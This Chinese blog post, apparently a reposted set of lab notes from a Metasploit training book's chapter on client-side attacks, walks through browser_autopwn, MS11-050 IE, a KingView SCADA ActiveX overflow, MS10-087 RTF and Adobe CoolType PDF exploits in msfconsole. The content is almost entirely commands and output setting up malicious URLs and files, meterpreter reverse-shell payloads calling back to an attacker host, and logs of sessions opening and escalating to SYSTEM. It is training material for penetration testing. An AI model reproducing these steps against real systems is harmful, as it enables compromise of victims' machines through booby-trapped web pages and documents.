《Metasploit 魔鬼训练营》06 客户端渗透攻击
来源:互联网 发布:sql注入攻击工具包 编辑:程序博客网 时间:2024/04/28 16:55
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程
1. MSF 中自动化浏览器攻击
2. MS11-050 安全漏洞
3. KingView 渗透攻击过程
4.MS10-087 安全漏洞
5. Adoba阅读器渗透攻击案例
1.MSF 中自动化浏览器攻击
msf auxiliary(browser_autopwn2) > search browser_autopwnMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter auxiliary/server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn)msf auxiliary(browser_autopwn2) > use auxiliary/server/browser_autopwnmsf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploitsmsf auxiliary(browser_autopwn) > set LHOST 10.10.10.128LHOST => 10.10.10.128msf auxiliary(browser_autopwn) > set SRVHOST 10.10.10.128SRVHOST => 10.10.10.128msf auxiliary(browser_autopwn) > set URIPATH autoURIPATH => automsf auxiliary(browser_autopwn) > run[*] Auxiliary module execution completed[*] Setup[*] Starting exploit modules on host 10.10.10.128...[*] ---[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp[*] Using URL: http://10.10.10.128:8080/KEQN[*] Server started.[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/DojeEicHhli[*] Server started.# 靶机浏览器访问 http://10.10.10.128:8080\auto 之后# 返回查看 msf 信息[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending HTML...[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/wXWj.swf[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending SWF...[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Requested: /SzjZbOOOH/OMcEvw/[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp[*] Using URL: http://10.10.10.128:8080/hjZLLYcGnJhR[*] Server started.[*] 10.10.10.254 ms14_064_ole_code_execution - Sending exploit...[*] 10.10.10.254 ms14_064_ole_code_execution - Sending VBS stager[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.254:1062) at 2017-09-20 02:02:34 -0400[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp[*] Using URL: http://10.10.10.128:8080/VAMgZvloTyhw[*] --- Done, found 20 exploit modules[*] Using URL: http://10.10.10.128:8080/auto[-] Auxiliary failed: Rex::RuntimeError The supplied resource '/auto' is already added.[-] Call stack:[-] /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:411:in `add_resource'[-] /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:188:in `start_service'[-] /usr/share/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:49:in `exploit'[-] /usr/share/metasploit-framework/modules/auxiliary/server/browser_autopwn.rb:171:in `run'[*] Cleaning up exploits...[*] Server stopped.
2. MS11-050 安全漏洞
msf > search ms11_050 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal MS11-050 IE mshtml!CObjectElement Use After Freemsf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement msf exploit(ms11_050_mshtml_cobjectelement) > info Name: MS11-050 IE mshtml!CObjectElement Use After Free Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2011-06-16 Provided by: d0c_s4vage sinn3r <sinn3r@metasploit.com> bannedit <bannedit@metasploit.com> Available targets: Id Name -- ---- 0 Automatic 1 Internet Explorer 7 on XP SP3 2 Internet Explorer 7 on Windows Vista 3 Internet Explorer 8 on XP SP3 4 Internet Explorer 8 on Windows 7 5 Debug Target (Crash) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- OBFUSCATE false no Enable JavaScript obfuscation SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload information: Space: 500 Avoid: 6 characters Description: This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). References: https://cvedetails.com/cve/CVE-2011-1260/ OSVDB (72950) https://technet.microsoft.com/en-us/library/security/MS11-050 http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.htmlmsf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_httpmsf exploit(ms11_050_mshtml_cobjectelement) > show options Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement): Name Current Setting Required Description ---- --------------- -------- ----------- OBFUSCATE false no Enable JavaScript obfuscation SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8080 yes The local listener port LURI no The HTTP Path Exploit target: Id Name -- ---- 0 Automaticmsf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH ms11050 TH => ms11050msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 10.10.10.128 OST => 10.10.10.128msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 8443msf exploit(ms11_050_mshtml_cobjectelement) > exploit [*] Exploit running as background job. [*] Started HTTP reverse handler on http://10.10.10.128:8443 [*] Using URL: http://0.0.0.0:8080/ms11050 msf exploit(ms11_050_mshtml_cobjectelement) > [*] Local IP: http://10.10.10.128:8080/ms11050 [*] Server started.# 靶机浏览器访问 http://10.10.10.128:8080/ms11050 之后# 返回查看 msf 信息 [*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)... [*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)... [*] 10.10.10.254 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
3.KingView 渗透攻击过程
http://www.cnblogs.com/justforfun12/p/5324408.html链接:http://pan.baidu.com/s/1geScJa7 密码:r9a5放在 /usr/share/metasploit-framework/modules/exploits/windows/browser 这个目录msf > search kingview Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/kingview_SCADA_activeX_validateuser 2011-03-07 normal KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow exploit/windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal KingView Log File Parsing Buffer Overflow exploit/windows/scada/KingView6.53overflow good Kingview 6.53 SCADA HMI HistorySvr Heap Overflow exploit/windows/scada/KingView6.53overflow good Kingview 6.53 SCADA HMI HistorySvr Heap Overflowmsf > use exploit/windows/browser/kingview_SCADA_activeX_validateuser msf exploit(kingview_SCADA_activeX_validateuser) > show options Module options (exploit/windows/browser/kingview_SCADA_activeX_validateuser): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / yes The URI to use. Exploit target: Id Name -- ---- 0 Automaticmsf exploit(kingview_SCADA_activeX_validateuser) > set URIP set URIPATH set URIPORT msf exploit(kingview_SCADA_activeX_validateuser) > set URIPATH kingview URIPATH => kingviewmsf exploit(kingview_SCADA_activeX_validateuser) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_httpmsf exploit(kingview_SCADA_activeX_validateuser) > set LHOST 10.10.10.128 LHOST => 10.10.10.128msf exploit(kingview_SCADA_activeX_validateuser) > set SRVHOST 10.10.10.128 SRVHOST => 10.10.10.128msf exploit(kingview_SCADA_activeX_validateuser) > set LPORT 8443 LPORT => 8443msf exploit(kingview_SCADA_activeX_validateuser) > exploit [*] Exploit running as background job. [*] Started HTTP reverse handler on http://10.10.10.128:8443 [*] Using URL: http://10.10.10.128:8080/kingview [*] Server started.# 靶机浏览器访问 http://10.10.10.128:8080/kingview 之后# 返回查看 msf 信息 [-] 10.10.10.254 kingview_SCADA_activeX_validateuser - Exception handling request: No encoders encoded the buffer successfully. [*] 10.10.10.254 kingview_SCADA_activeX_validateuser - Sending KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow to 10.10.10.254:1045...
4.MS10-087 安全漏洞
# 先生成渗透文件msf > search ms10_087 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > show options Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.rtf yes The file name. Exploit target: Id Name -- ---- 0 Automaticmsf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec payload => windows/execmsf exploit(ms10_087_rtf_pfragments_bof) > set CMD calc.exe CMD => calc.exemsf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf FILENAME => ms10087.rtfmsf exploit(ms10_087_rtf_pfragments_bof) > exploit [*] Creating 'ms10087.rtf' file ... [+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf# 将渗透文件 /root/.msf4/local/ms10087.rtf 拷贝到靶机中并打开# 弹出一个计算器,攻击成功
5. Adoba阅读器渗透攻击案例
# 配置测试模块生成文件msf > search adobe_coolMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflowmsf > use exploit/windows/fileformat/adobe_cooltype_sing msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf exploit(adobe_cooltype_sing) > set LHOST 10.10.10.128LHOST => 10.10.10.128msf exploit(adobe_cooltype_sing) > set LPORT 8443LPORT => 8443msf exploit(adobe_cooltype_sing) > set FILENAME 2.pdfFILENAME => 2.pdfmsf exploit(adobe_cooltype_sing) > run[*] Creating '2.pdf' file...[+] 2.pdf stored at /root/.msf4/local/2.pdf# 将文件复制到靶机# 启动监听端msf exploit(adobe_cooltype_sing) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf exploit(handler) > set LHOST 10.10.10.128LHOST => 10.10.10.128msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.10.128 yes The local listener hostname LPORT 8080 yes The local listener port LURI no The HTTP PathExploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > exploit [*] Started HTTP reverse handler on http://10.10.10.128:8080# 靶机打开文件后 msf 显示[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: duvbthou) Staging x86 payload (958035 bytes) ...[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1048) at 2017-09-20 11:08:55 -0400[*] Session ID 1 (10.10.10.128:8443 -> 10.10.10.254:1048) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'[*] Current session process is acrord32.exe (2136) as: DH-CA8822AB9589\Administrator[*] Session is Admin but not System.[*] Will attempt to migrate to specified System level process.[*] Trying services.exe (716)[+] Successfully migrated to services.exe (716) as: NT AUTHORITY\SYSTEM
阅读全文
0 0
- 《Metasploit 魔鬼训练营》06 客户端渗透攻击
- 《Metasploit 魔鬼训练营》05 网络服务渗透攻击
- 《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击
- Metasploit渗透测试魔鬼训练营
- 《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透
- 《Metasploit渗透测试魔鬼训练营》 之 信息收集工具
- 《Metasploit渗透测试魔鬼训练营》 之 工具整理
- 《Metasploit渗透测试魔鬼训练营》 之 SQL注入
- 《Metasploit渗透测试魔鬼训练营》 之 XSS
- 《Metasploit渗透测试魔鬼训练营》 之 命令注入
- 《Metasploit渗透测试魔鬼训练营》 之 文件包含
- 《Metasploit 魔鬼训练营》02 渗透测试实验环境
- 《Metasploit 魔鬼训练营》04 Web 应用渗透测试
- 《Metasploit 魔鬼训练营》08 移动环境渗透测试
- 《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透
- 《Metasploit 魔鬼训练营》01 初识 Metasploit
- 《metasploit渗透测试魔鬼训练营》学习笔记第三章----情报搜集
- 《metasploit渗透测试魔鬼训练营》靶机演练之第五章实战案例Oracle数据库
- 栅栏染色
- svn报错:Cannot negotiate authentication mechanism
- Python Kivy 中文教程:安装(Windows)
- WebStorm配置使用SVN详细过程
- 代码开发中常用的英语---更新中
- 《Metasploit 魔鬼训练营》06 客户端渗透攻击
- POJ 1003 Hangover
- C# 实现Sort接口 排序自定义实体类集合
- DASH简介及使用方法(FFmpeg)
- Java中的Spring+Mybatis整合时出现找不到spring-mybatis.xml文件
- Oracle 程序包里 直接调用 存储过程
- SlidingMenu初始化
- 关于文件上传
- 《Metasploit 魔鬼训练营》07 社会工程学